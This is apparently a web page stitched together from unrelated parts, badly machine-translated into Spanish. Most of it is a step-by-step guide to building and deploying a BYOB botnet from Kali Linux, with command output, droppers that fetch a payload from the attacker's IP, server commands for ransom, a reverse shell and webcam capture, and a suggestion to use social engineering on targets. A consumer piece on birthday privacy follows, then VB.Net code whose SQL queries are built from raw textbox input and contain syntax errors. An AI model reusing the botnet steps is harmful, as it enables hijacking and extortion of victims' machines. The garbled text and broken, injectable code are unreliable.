   almacenado en el directorio: /root/.cache/pip/wheels/b8/ec/c5/ 6b63d5d1ecfe8bf1b3ae768b793b1643e19dde790de6363c4c 
Construyó exitosamente WMI pyxhook PyInstaller 
Instalando los paquetes recolectados: las partes de las partes de las partes de los equipos, partes de las partes de las partes de los animales, partes de las partes de los animales, partes de las partes de los equipos, partes de 
   las partes de las partes de los 
     animales, usr / lib / python2.7 / dist-packages, entorno externo / usr 
     No se puede desinstalar 'numpy'. No se encontraron archivos para desinstalar. 
   Instalación existente encontrada: colorama 0.3.7
     No desinstalar colorama en / usr/lib/python2.7/dist-packages, outside environment / usr 
     No se puede desinstalar 'colorama'. No se encontraron archivos para desinstalar. 
PyInstaller-3.3.1 WMI-1.4.9 altgraph-0.16.1 colorama-0.3.9 dis3-0.1.3 instalado macholib-1.11 mss-3.3.0 numpy-1.15.2 opencv-python-3.4.3.18 python-xlib -0.23 pyxhook-1.0.0 twilio-6.14.0
  • Escribe python setup.py
  • Después de pulsar enter se le pedirá la contraseña. Simplemente ingrese la contraseña de Kali Linux.
root @ kali: / home / iicybersecurity / Downloads / byob / byob # python setup.py
Ingrese su contraseña de sudo (para instalar las dependencias de python):
Instalando mss == 3.3.0…
Instalando WMI == 1.4.9…
Instalando numpy == 1.15.2…
Instalando pyxhook == 1.0.0…
Instalando twilio == 6.14.0…
Instalando colorama == 0.3.9…
Instalando solicitudes == 2.20.0…
Instalando PyInstaller == 3.3.1…
Instalando opencv-python == 3.4.3.18…
Instalando pyHook == 1.5.1; sys.platform == 'win32'…
Instalando pypiwin32 == 223; sys.platform == 'win32'…
  • Aquí se utilizarán dos terminales , el primer terminal será el Servidor Bot donde se manejarán las sesiones y el segundo terminal el Cliente Bot donde se crearán los robots.
  • Después de instalar todas las dependencias, escriba python server.py –port 445
  • el puerto 445 se utiliza para iniciar el servidor en este puerto en particular. Puede asignar cualquiera de los puertos.
root @ kali: / home / iicybersecurity / Downloads / byob / byob # python server.py --port 445

Después de iniciar la ayuda del tipo de servidor para ver algunos comandos importantes del servidor bot.

[root @ / home / iicybersecurity / Downloads / byob / byob]> help
 [?] Sugerencia: muestre la información de uso con el comando 'help' 

bg [id] en el fondo de una sesión (por defecto: la sesión actual) 
  transmita una tarea a todos los 
  clientes de sesiones activas muestran todos los clientes que se han unido a la 
  depuración del servidor                    run python code directly on server (debugging MUST be enabled)
  exit                            quit the server
  help                            show usage help for server commands
  kill                        end a session
  options                         show currently configured settings
  query                query the SQLite database
  ransom [id]                     encrypt client files & ransom encryption key for a Bitcoin payment
  results [id]                    display all completed task results for a client (default: all clients)
  sessions                        show active client sessions
  set  [option=value]    change the value of a setting
  shell                       interact with a client with a reverse TCP shell through an active session
  tasks [id]                      display all incomplete tasks for a client (default: all clients)
  webcam                    capture image/video from the webcam of a client device 
  • Luego abre otra terminal de linux.
  • Escriba cd / home / iicybersecurity / Downloads / byob / byob
  • Luego escriba python client.py –help
root @ kali: / home / iicybersecurity / Downloads / byob / byob # python client.py --help 
use: client.py [-h] [--name NAME] [--icon ICON] [--pastebin API] [ --encrypt]
[--compress] [--freeze] [-v]
host host [module [module ...]] Argumentos posicionales del


generador (Build Your Own Botnet)


:
servidor IP dirección
servidor puerto puerto número de puerto
módulo módulo (s) módulo (s) para importar remotamente en el tiempo de ejecución los


argumentos opcionales:
-h, --help muestra este mensaje de ayuda y sale
--nombre NOMBRE nombre de archivo de salida
- icono de icono ICON nombre de archivo de imagen
- API de Pastebin carga la carga útil en Pastebin (en lugar de Servidor C2
que lo aloja)
--cifrar cifrar la carga útil con una clave aleatoria de 128 bits incrustada en
el
stager de la carga útil --comprimir zip-compress en un script de Python autoextraíble
--freeze compilar el cliente en un ejecutable independiente para la
plataforma host actual
-v, - Versión Mostrar el número de versión del programa y salir.
  • Escriba python client.py –name testbot.py 192.168.1.7 445
root @ kali: / home / iicybersecurity / Downloads / byob / byob # python client.py --name testbot.py
  • –Nombre se usa para ingresar el nombre de la botnet. Aquí el nombre del bot es testbot.py
  • 192.168.1.7 es la dirección IP del atacante.
  • 445 es el mismo puerto que se usa para asignar el servidor de botnet en 445. Debe ingresar el mismo número de puerto que se asignó en el servidor de bot.
[>] Módulos de 
Adición de módulos ... (3 módulos añadido al cliente)
[>] Las importaciones
Adición de importaciones ... - (26 importaciones de 3 módulos)
[>] de carga útil
de carga útil Comprimir ... (121,261 bytes reducen a 64,855 bytes (-47,0% más pequeño)
Carga Carga útil ... - (carga útil de alojamiento en: http://192.168.1.7:4446//payloads/a5o.py)
[>] Stager
Compressing stager… - (2,194 bytes reducido a 2,159 bytes (-2.0% más pequeño)
Cargando stager ... ( stager de hosting en: http://192.168.1.7:4446//stagers/a5o.py)
[>] Dropper
Writing dropper ... (203 bytes escritos en testbot.py )
  • Después de ejecutar la consulta anterior, se creará una nueva botnet. La consulta anterior se ejecutará.
  • Ahora puedes usar cualquier truco de ingeniería social para abrir bot en su computadora.
  • Aquí tenemos dos objetivos. El primero es el Linux y el segundo es el Windows.
  • Ahora tenemos botnet abierto en la máquina de destino de Linux.
  • Para abrir bot, simplemente escriba python testbot.py en el terminal Linux de destino.
root @ times: / Downloads / python testbot.py

Cuando la consulta anterior se ejecuta en la máquina de destino. Se creará una sesión en el servidor botnet.

[+] Nueva conexión: 192.168.1.10

Sesión: 2 

Comenzó: mar 22 de enero 05:14:24 2019
  • La conexión anterior se creará cuando el bot se ejecute en la máquina de destino.
  • Para verificar la sesión, vaya al terminal del servidor bot donde se ejecuta el servidor bot y escriba sesiones
[root @ / home / iicybersecurity / Downloads / byob / byob]> session 

1
nombre de usuario
administrador de root True
uid c94e3a38e43e74bb4f667d86d21a7574
session True
mac_address C2: 97: F3: 9F: 2:
local_ip 127.0.1.1
ingresado en 2019-01-22 05:14: 24.809827
last_online 2019-01-22 07: 12: 52.295591
public_ip 146.196.34.40
plataforma linux2
architecture 64 en
línea True
device kali
  • Como puedes ver, el objetivo se muestra verdadero. Eso significa que bot está completamente configurado en la máquina de destino.
  • Ahora puedes ejecutar varios comandos para manipular el objetivo.

MÁQUINA DE WINDOWS DE DESTINO: –

  • Ahora para crear para Windows bot tipo python client.py –name testbot2.py –freeze 192.168.1.7 445 en el terminal de Linux.
  • –Nombre se usa para ingresar el nombre del bot. Aquí el nombre del bot es testbot2.py
  • –Freeze se utiliza para crear el archivo ejecutable de Windows.
  • 192.168.1.7 es la dirección IP del atacante.
  • 445 es el mismo puerto que se usa para asignar el servidor de botnet en 445. Debe ingresar el mismo número de puerto que se asignó en el servidor de bot.
root @ kali: / home / iicybersecurity / Downloads / byob / byob # python client.py --name testbot2.py --freeze 192.168.1.7 445


 [>] Módulos 
         Adición de módulos ... - (3 módulos agregados al cliente) 
[>] Importaciones 
         Agregar importaciones ..- (26 importaciones desde 3 módulos) 
[>] Carga de carga Carga útil ... - (carga de hosting en: http://192.168.1.8:446//payloads/l3p.py) 
[>] Stager 
         Cargando carga stager ... (hosting stager en: http://192.168.1.8:446//stagers/l3p.py) 
[>] Dropper 
         Writing dropper ... (203 bytes escritos en testbot2.py)
         Compilación del ejecutable ... 13014 INFO: PyInstaller: 3.3.1 
13014 INFO: Python: 2.7.15+ 
13015 INFO: Plataforma: Linux-4.17.0-kali1-686-pae-i686-with-Kali-kali-rolling-kali-rolling 
13130 ​​INFO: UPX está disponible. 
13210 INFO: Extendiendo PYTHONPATH con rutas 
['/ home / iicybersecurity / Downloads / byob', 
  '/ home / iicybersecurity / Downloads / byob / byob'] 
13210 INFO: Encriptará el bytecode de Python con la clave: 34jZd5tQSBJwEuK2 
13210 INFO: Dependencia de las dependencias .py módulo 
13211 INFO: verificación Análisis 
13211 INFO: Análisis de construcción porque out00-Analysis.toc no existe
13211 INFO: Inicializando el gráfico de dependencia del módulo ... 
13252 INFO: Inicializando los ganchos del gráfico del módulo ... 
13285 INFO: Analizando la importación oculta 'base64' 
16343 INFO: Analizando la importación oculta 'json' 
16556 INFO: Analizando la importación oculta 'zlib' 
16557 INFO: Analizando la importación oculta ' urllib ' 
17744 INFO: analizando la importación oculta' 
uuid ' 17992 INFO: analizando la importación oculta' numpy ' 
34445 INFO: Procesando el gancho del módulo de importación pre-seguro _xmlplus 
39010 INFO: Procesando los datos del gancho de la ruta del módulo de pre-búsqueda 
81800 INFO: Procesando la importación pre-segura módulo hook six.moves 
95678 INFO: Análisis de importación oculta 'colorama' 
96647 INFO: Análisis de 'solicitudes' de importación oculta
114809 INFO: analizando la importación oculta 'Crypto.Cipher._AES' 
115242 INFO: ejecutando Analysis out00-Analysis.toc 
115311 INFO: Almacenamiento en caché del módulo ... 
115434 INFO: Analizando /home/iicybersecurity/Downloads/byob/byob/testbot2.py 
115471 INFO : Cargando ganchos de módulo ... 
115472 INFO: Cargando gancho de módulo "hook-distutils.py" ... 
116244 INFO: Cargando gancho de módulo "hook-sysconfig.py" ... 
116290 INFO: Cargando módulo ganchos "hook-xml.py" ... 
116348 INFO: Cargando el gancho del módulo "hook-httplib.py" ... 
116351 INFO: Cargando el gancho del módulo "hook-pydoc.py" ... 
116361 INFO: Excluyendo importación 'Tkinter' 
116368 INFO: Eliminando la importación de Tkinter del módulo pydoc 
116368 INFO: Cargando gancho del módulo "hook-encodings.py "…
121171 INFO: Cargando el gancho del módulo "hook-_tkinter.py"… 
122361 INFO: revisando el árbol 
122361 INFO: Construyendo el árbol porque out00-Tree.toc no existe 
122361 INFO: Construyendo el árbol out00-Tree.toc 
122453 INFO: comprobando el árbol 
122453 INFO : Building Tree porque out01-Tree.toc no existe 
122453 INFO: Building Tree out01-Tree.toc 
122482 INFO: Cargando módulo gancho "hook-xml.domreg.py"… 
122509 INFO: Cargando módulo hook "hook-pkg_resources .py "... 
123352 INFO: Procesando el gancho del módulo de importación pre-seguro win32com 
123752 INFO: Cargando el gancho del módulo" hook-requests.py "... 
123816 INFO: Cargando el gancho del módulo" hook-certifi.py "... 
124009 INFO: Cargando el gancho del módulo" herramientas de configuración de gancho.py "...
124141 INFO: Cargando el gancho del módulo "hook-cryptography.py"… 
126355 INFO: Cargando el gancho del módulo "hook-pytest.py"… 
130654 INFO: Cargando el gancho del módulo "hook-numpy.core.py" ... 
130910 INFORMACIÓN: revisando el árbol 
130910 INFO: Building Tree porque out02-Tree.toc no existe. 
130910 INFO: Building Tree out02-Tree.toc. 
130912 INFO: buscando ctypes DLLs 
132082 INFO: analizando enganches en tiempo de 
ejecución ... 132110 INFO: incluyendo gancho en tiempo de ejecución 'pyi_rth__tkinter. py ' 
132172 INFO: Incluye el tiempo de ejecución' pyi_rth_multiprocessing.py ' 
132189 INFO: Incluye el tiempo de ejecución' 
pyi_rth_pkgres.py ' 132225 INFO: Buscando bibliotecas dinámicas 
134508 INFO: Buscando huevos
134509 INFO: la biblioteca de Python no está en dependencias binarias. Haciendo búsquedas adicionales ... 
135303 INFO: Usando la biblioteca de Python /lib/i386-linux-gnu/libpython2.7.so.1.0 
135334 INFO: Advertencias escritas en /home/iicybersecurity/Downloads/byob/byob/build/testbot2/warntestbot.txt 
136600 INFO: Referencia cruzada del gráfico escrita en /home/iicybersecurity/Downloads/byob/byob/build/testbot2/xref-testbot2.html 
137198 INFO: comprobando PYZ 
137199 INFO: Construyendo PYZ porque out00-PYZ.toc no existe 
137199 INFO : Building PYZ (ZlibArchive) /home/iicybersecurity/Downloads/byob/byob/build/testbot2/out00-PYZ.pyz 
140632 INFO: Building PYZ (ZlibArchive) / home / iicybersecurity / Downloads / byob / byob / byob / byob / bybob / quad / testbot2 / out00 -PYZ.pyz completado con éxito.
141007 INFO: comprobando PKG 
141008 INFO: generando PKG porque out00-PKG.toc no existe. 
141008 INFO: generando PKG (CArchive) out00-PKG.pkg 
161496 INFO: construyendo PKG (CArchive) out00-PKG.pkg se completó correctamente. 
161599 INFO: Bootloader /usr/local/lib/python2.7/dist-packages/PyInstaller/bootloader/Linux-32bit/run 
161599 INFO: verificando EXE 
161599 INFO: Construyendo EXE porque out00-EXE.toc no existe 
161600 INFO: Construyendo EXE desde out00-EXE.toc 
162033 INFO: Agregando archivo a la sección ELF en EXE / home / iicybersecurity / Downloads / byob / byob / dist / testbot2 
163893 INFO: Construyendo EXE desde out00-EXE.toc se completó con éxito.
 (24,818,636 bytes guardados en el archivo: / home / iicybersecurity / Downloads / byob / byob / dist / testbot2)
  • Después de ejecutar la consulta anterior se crearán dos archivos. testbot2.py & testbot2.spec
  • Cambie el nombre de testbot2.spec a testbot2.exe.
  • Para cambiar el nombre, escriba mv testbot2.spec testbot2.exe
root @ kali: / home / iicybersecurity / Downloads / byob / byob # mv testbot2.spec testbot2.exe
 root @ kali: / home / iicybersecurity / Downloads / byob / byob #
  • Ahora tenemos botnet abierto en la máquina de Windows de destino.
  • Para ejecutar bot en windows target machine. Python 2.7 debe estar instalado y las variables de entorno deben configurarse para ejecutar bot.
  • Para configurar el entorno PATH de Python, vaya a: https://www.python.org/download/releases/2.7/
  • Luego abra Propiedades de Mi PC> Configuración avanzada del sistema> Variables de entorno> Variables del sistema .
  • Haga clic en Nuevo e ingrese el Nombre de la variable: Ruta Variable Ruta: ruta \ a \ su \ python \ instalador
  • Para comprobar si Python se ha configurado correctamente. Abra cmd en la máquina de Windows y escriba python –version
  • Después de configurar python, ejecuta bot en cmd .
  • Para abrir el tipo de bot, ejecute testbot2.exe en Windows CMD.
  • Cuando la consulta anterior se ejecuta en la máquina de destino. Se creará una sesión en el servidor botnet.
  • Para comprobar la sesión, escriba clientes
[root @ / home / iicybersecurity / Descargas / BYOB / BYOB] 
> clientes 
 1` 
    nombre de usuario iicybersecurity 
    administrador verdadera 
    7ac235609435c8a16adc9049ec187daa UID 
    sesiones verdadera 
    mac_address D4: 52: 2A: 45: 31: E4 
    local_ip 169.254.123.37 
    unieron 01/23/2019 06: 21: 27.582403 
    last_online 2019-01-23 07: 22: 15.861055 
    public_ip 27.5.19.124 
    plataforma win32 
    architecture 32 en 
    línea True
    dispositivo WIN-31VSBP3FUQT
  • Como puedes ver, el objetivo se muestra verdadero. Eso significa que bot está completamente configurado en la máquina de destino.
  • Ahora puedes ejecutar varios comandos para manipular el objetivo.
  • Como bot también se puede utilizar en ataques de ingeniería social. También hay otras formas de secuestrar a cualquier usuario que use trevarc2 , lo que le ayudará a tomar el control de la máquina de destino.

Por qué es peligroso compartir tu fecha de cumpleaños en línea

Un cumpleaños no es algo que puedas pensar como información privada que debes mantener en secreto. Casi todos los celebran en las redes sociales, y muchas personas los publican en su perfil. Esa es una idea horrible; este es el por qué.

Es probablemente una de tus preguntas de seguridad

Junto con el modelo de su primer automóvil y el apellido de soltera de su madre, su cumpleaños es quizás la pregunta de seguridad más común en la mayoría de los sitios web.

Las preguntas de seguridad son notoriamente horribles.  Es probable que sean la causa de la mayoría de los “hacks” de redes sociales en línea, incluida la violación de iCloud 2014 que afectó a muchas celebridades. El fallo está en los sistemas de recuperación de contraseña; están diseñados para que puedas restablecer tu contraseña fácilmente, pero a menudo facilitan que los hackers hagan lo mismo. Forzar de forma bruta su contraseña en un sitio web ya no es realmente una cosa, y la mayoría de los “trucos” que puede experimentar confían en que lo atrapen en violaciones de datos masivas o que tengan terribles preguntas de seguridad.

Como tu cumpleaños Es una maravilla que aún sea una opción para la ya insegura “protección de preguntas de seguridad”, ya que es mucho más fácil para un pirata informático descubrir su cumpleaños que “la calle en la que creció”. Ya que también es una de las más sencillas. Para recordar preguntas, es probable que sea elegido muy a menudo. Eso es un problema porque muchas personas lo publican públicamente en su perfil, o al menos dejan una lista de publicaciones de “¡Feliz cumpleaños!” Cada año. De hecho, las personas dan muchas respuestas a preguntas de seguridad en forma de “cuestionarios” compartidos en Facebook. Otro día, otro vector de ataque hilarante.

Incluso si su cumpleaños no es la respuesta a una pregunta de seguridad real en su cuenta, sigue siendo información que una persona puede usar cuando intenta obtener acceso a su cuenta por otros medios, como llamar a su proveedor de servicios y pretender ser usted.

Funciona como tu contraseña a veces

Cuando me actualicé a un teléfono nuevo en una tienda de Verizon, me pidieron dos cosas: mi número de teléfono y mi cumpleaños. Nada más. Luego procedieron a cambiar toda mi línea telefónica a un nuevo dispositivo. Eso es un problema porque esos dos números fácilmente accesibles presentan un vector de ataque obvio contra la autenticación de dos factores.

La autenticación de dos factores (a menudo llamada 2FA) es cuando un servicio envía un código a su teléfono (o solicita un código generado por una aplicación), y debe ingresar ese código además de su contraseña. Es una gran manera de mejorar la seguridad. También se usa a menudo para la recuperación de la cuenta, ya que nadie debería tener acceso a un dispositivo en su bolsillo, excepto usted. Pero si alguien puede robar virtualmente su número de teléfono solo por saber su cumpleaños, compromete cualquier servicio que se base en él.

Y no solo su teléfono puede ser vulnerable, este problema de “cumpleaños como contraseña” prevalece en muchos lugares. ¿Cuántas veces le han pedido a su cumpleaños que verifique algo? Tiene sentido, ya que todos tienen un cumpleaños, por lo que es fácil de recordar. También es  bastante seguro, ya que la cantidad de días en un período de tiempo de 30 años ya es más que los 10,000 posibles combos de PIN de cuatro dígitos. Pero las personas no fijan su PIN en la parte superior de sus perfiles de Facebook.

Guarde, edite, elimine datos utilizando VB.Net y SQL Server 2000

Este código para guardar, editar y eliminar datos en VB.Net utilizando SQLServer como backend. este código es continuación de mi publicación anterior “Mostrar datos en DataGrid con VB.Net 2003 y SQLServer 2000”. así que no escribí el código de cómo conectar SQLServer 2000 con VB.Net 2003 porque esto ya está allí.
Por favor, lea y lea un comentario en el código cuidadosamente para que este código pueda implementar productos.

' Programmed By Jery M
 'this Following code shows how to Save, Edit, Delete Data using VB.Net and SQL Server 2000 as database.
 'this code needed some control :
 'a database with 4 column (Id[primary key],FirstName,LastName,Age)
 '3 button (cmdSave,cmdEdit,cmdDelete)
 '4 text box (txtId,txtFirstName,txtLastName,txtAge).
 '1 datagrid (named dgStudent)
 ' This Proceduere to refresh form and refresh data in datagrid (always show the newest data)
 Private Sub Refresh_Form()
        Dim conn As SqlConnection
        Dim cmdStudent As New SqlCommand
        Dim daStudent As New SqlDataAdapter
        Dim dsStudent As New DataSet
        Dim dtStudent As New DataTable
    'clear all textbox
        txtId.Text = ""
        txtFirstName.Text = ""
        txtLastName.Text = ""
        txtAge.Text = ""
        
    'this part to call data from database and show in datagrid
        conn = GetConnect()
        Try
            cmdStudent = conn.CreateCommand
            cmdStudent.CommandText = "SELECT * FROM Student"
            daStudent.SelectCommand = cmdStudent
            daStudent.Fill(dsStudent, "Student")
            dgStudent.DataSource = dsStudent
            dgStudent.DataMember = "Student"
            dgStudent.ReadOnly = True
        Catch ex As Exception
            MsgBox("Error: " & ex.Source & ": " & ex.Message, MsgBoxStyle.OKOnly, "Connection Error !!")
        End Try
End Sub
  Private Sub btnAdd_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnAdd.Click
        Dim check As Integer
        Dim conn As SqlConnection
        Dim cmdStudent As New SqlCommand
        Dim cmdStudent1 As New SqlCommand
        Dim daStudent As New SqlDataAdapter
        Dim dsStudent As New DataSet
        Dim dtStudent As New DataTable
        If txtId.text = "" Or txtFirstName.Text = "" txtLastName.Text = "" Or txtAge.Text = "" Then
            MsgBox("Student Data is not completed", MsgBoxStyle.OKOnly)
        Else
            If MsgBox("Are you sure to save Student data with Id : " & txtId.text & " ?", MsgBoxStyle.OKCancel, "Input confirm") = MsgBoxResult.Cancel Then
                ' do nothing
            Else
                Try
                    conn = GetConnect()
                    conn.Open()
                    cmdStudent = conn.CreateCommand
                    cmdStudent.CommandText = "SELECT * FROM Student WHERE Id='" & Trim(txtId.text) & " ' "
                    daStudent.SelectCommand = cmdStudent
                    daStudent.Fill(dsStudent, "Student")
                    dtStudent = dsStudent.Tables("Student")
                    If (dtStudent.Rows.Count > 0) Then
                        MsgBox("Student dengan Id " & Trim(cmbId.Text) & " already in database", MsgBoxStyle.OKOnly, "Message :")
                    Else
                        
                        cmdStudent1 = conn.CreateCommand
                        cmdStudent1.CommandText = "INSERT INTO Student(Id, FirstName, LastName,Age) VALUES('" & Trim(txtId.text) & "','" & Trim(txtFirstName.Text) & "','" & Trim(txtLastName.Text) & "','" & Trim(txtAge.Text) & "')"
                        check = cmdStudent1.ExecuteReader.RecordsAffected()
                        If check > 0 Then
                            MsgBox("Student With Id " & Trim(cmbId.Text) & " succesfully to added", MsgBoxStyle.OKOnly, "Message :")
                        Else
                            MsgBox("Student With Id " & Trim(cmbId.Text) & " Failure  to added", MsgBoxStyle.OKOnly, "Message :")
                        End If
                        Refresh_Form()
                        conn.Close()
                    End If
                Catch ex As Exception
                    MsgBox("Error: " & ex.Source & ": " & ex.Message, MsgBoxStyle.OKOnly, "Connection Error !!")
                End Try
            End If
        End If
    End Sub
    Private Sub btnEdit_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnEdit.Click
        Dim check As Integer
        Dim cmdStudent As New SqlCommand
        Dim daStudent As New SqlDataAdapter
        Dim dsStudent As New DataSet
        If txtId.text = "" Then
            MessageBox.Show("Please fill all data!!", "Error", MessageBoxButtons.OK, MessageBoxIcon.Exclamation)
        Else
            If txtId.text = "" Or txtFirstName.Text = "" txtLastName.Text = "" Or txtAge.Text = "" Then
            MsgBox("Student Data is not completed", MsgBoxStyle.OKOnly)
        Else
                If MsgBox("Are you sure to edit Student data with Id : " & txtId.text & " ?", MsgBoxStyle.OKCancel, "Edit confirm") = MsgBoxResult.Cancel Then
                    ' do nothing
                Else
                    Try
                        conn = GetConnect()
                        conn.Open()
                        cmdStudent = conn.CreateCommand
                        cmdStudent.CommandText = "UPDATE Student SET FirstName ='" & Trim(txtFirstName.Text) & "', LastName= '" & Trim(txtLastName.Text) & "' , Age='" & Trim(txtAge.Text) & "' WHERE Id ='" & Trim(txtId.text) & "'"
                        check = cmdStudent.ExecuteReader.RecordsAffected
                        If check > 0 Then
                            MsgBox("Student With Id " & Trim(txtId.text) & " Succesfully To Edit", MsgBoxStyle.OKOnly, "Info Update Data Student ")
                        Else
                            MsgBox("Student With Id " & Trim(txtId.text) & " Failure To Edit", MsgBoxStyle.OKOnly, "Info Update Data Student ")
                        End If
                        Refresh_Form()
                        conn.Close()
                    Catch ex As Exception
                        MsgBox("Error: " & ex.Source & ": " & ex.Message, MsgBoxStyle.OKOnly, "Connection Error !!")
                    End Try
                End If
            End If
        End If
    End Sub
    Private Sub btnDelete_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnDelete.Click
        Dim check As Integer
        Dim conn As SqlConnection
        Dim cmdStudent As New SqlCommand
        Dim daStudent As New SqlDataAdapter
        Dim dsStudent As New DataSet
        If txtId.text <> "" Then
            If MsgBox("Are you sure to delete data with Id : " & txtId.text & " ?", MsgBoxStyle.OKCancel, "Delete confirm") = MsgBoxResult.Cancel Then
                ' do nothing
            Else
                conn = GetConnect()
                Try
                    conn.Open()
                    cmdStudent = conn.CreateCommand
                    cmdStudent.CommandText = "DELETE FROM Student WHERE Id ='" & Trim(txtId.text) & "'"
                    check = cmdStudent.ExecuteReader.RecordsAffected
                    If check > 0 Then
                        MsgBox("Student With Id " & Trim(txtId.text) & " Succesfully To Delete", MsgBoxStyle.OKOnly, "Info Delete Student")
                    Else
                        MsgBox("Student With Id " & Trim(txtId.text) & " Failure To Delete", MsgBoxStyle.OKOnly, "Info Delete Student")
                    End If
                    Refresh_Form()
                    conn.Close()
                Catch ex As Exception
                    MsgBox("Error: " & ex.Source & ": " & ex.Message, MsgBoxStyle.OKOnly, "Connection Error !!")
                End Try
            End If
        Else
                MsgBox("fill Id Student on Id textbox which student to delete!!", MsgBoxStyle.OKOnly, "Info Data")
            End If
    End Sub